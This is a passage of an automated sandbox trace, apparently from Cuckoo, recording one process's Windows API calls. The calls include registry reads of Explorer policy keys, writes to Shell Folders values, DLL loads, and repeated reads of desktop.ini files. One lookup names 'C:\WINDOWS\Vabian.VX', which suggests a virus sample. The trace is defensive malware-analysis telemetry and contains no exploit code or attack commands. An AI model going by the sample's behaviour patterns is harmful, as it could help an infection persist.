Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b602d500-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x000001fc Buffer => D\x00r\x00i\x00v\x00e\x00\x00\x00 ValueName => BaseClass Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x000001fc SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000200 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000202 Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegEnumKeyW |
Handle => 0x00000202 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fe Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe Data => 32 ValueName => DriveMask |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fe |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegEnumKeyW |
Handle => 0x00000202 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 1 |
FAILURE | 0x00000103 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000202 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS |
SUCCESS | 0x00193e98 | |
| 19:40:26,443 | 252 | LdrLoadDll |
Flags => 1300444 BaseAddress => 0x7c9c0000 FileName => SHELL32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 102 FunctionName => FunctionAddress => 0x7c9ef5e2 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrLoadDll |
Flags => 1300484 BaseAddress => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoTaskMemAlloc FunctionAddress => 0x774fd060 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 320 FunctionName => FunctionAddress => 0x773e0a75 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 324 FunctionName => FunctionAddress => 0x773e0c22 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 323 FunctionName => FunctionAddress => 0x773e0b17 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000202 Registry => 0x80000000 SubKey => Directory |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000202 SubKey => CurVer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fe Registry => 0x00000202 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000202 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000200 DataLength => 4 ValueName => DontShowSuperHidden Type => 1300148 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x00000200 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 36 ValueName => ShellState Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => ValueName => ShellState |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => ForceActiveDesktopOn Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => NoActiveDesktop Type => 1299476 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | GetSystemMetrics |
SystemMetricIndex => 4096 |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\System |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | GetSystemMetrics |
SystemMetricIndex => 4096 |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => NoWebView Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => ClassicShell Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => SeparateProcess Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => NoNetCrawling Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => NoSimpleStartMenu Type => 1299480 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000204 Registry => 0x00000200 SubKey => Advanced |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 2 ValueName => Hidden |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 1 ValueName => ShowCompColor |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 1 ValueName => HideFileExt |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 0 ValueName => DontPrettyPath |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 1 ValueName => ShowInfoTip |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 0 ValueName => HideIcons |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 0 ValueName => MapNetDrvBtn |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 1 ValueName => WebView |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 0 ValueName => Filter |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => ShowSuperHidden Type => 1300648 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 Data => 0 ValueName => SeparateProcess |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000204 DataLength => 4 ValueName => NoNetCrawling Type => 1300648 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000204 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001fe SubKey => ShellEx\IconHandler |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe DataLength => 0 ValueName => DocObject Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe DataLength => 0 ValueName => BrowseInPlace Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001fe SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020a Registry => 0x80000000 SubKey => Folder |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x0000020a SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe DataLength => 0 ValueName => IsShortcut Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe DataLength => 2 ValueName => AlwaysShowExt Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fe DataLength => 0 ValueName => NeverShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 388 FunctionName => FunctionAddress => 0x773e1535 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fe |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020a |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoTaskMemFree FunctionAddress => 0x774fd044 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS\Vabian.VX |
SUCCESS | 0x00193e98 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000208 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000208 DataLength => 4 ValueName => AllowFileCLSIDJunctions Type => 1299648 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000208 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00M\x00y\x00 \x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\x00\x00 ValueName => Personal |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x000001fc Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00M\x00y\x00 \x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\x00\x00 ValueName => Personal Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoInitializeEx FunctionAddress => 0x774fef7b ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x000001fc SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020c Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\My Documents |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 66 FunctionName => FunctionAddress => 0x7c9f063c ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 100 FunctionName => FunctionAddress => 0x7c9ec059 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020c DataLength => 4 ValueName => UseDesktopIniCache Type => 1293620 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoUninitialize FunctionAddress => 0x774fee46 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x0000020c Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020c Data => %\x00A\x00L\x00L\x00U\x00S\x00E\x00R\x00S\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\x00\x00 ValueName => Common Documents |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x0000020c Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x0000020c Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\x00\x00 ValueName => Common Documents Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x0000020c SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x000001fc FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x000001fc FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
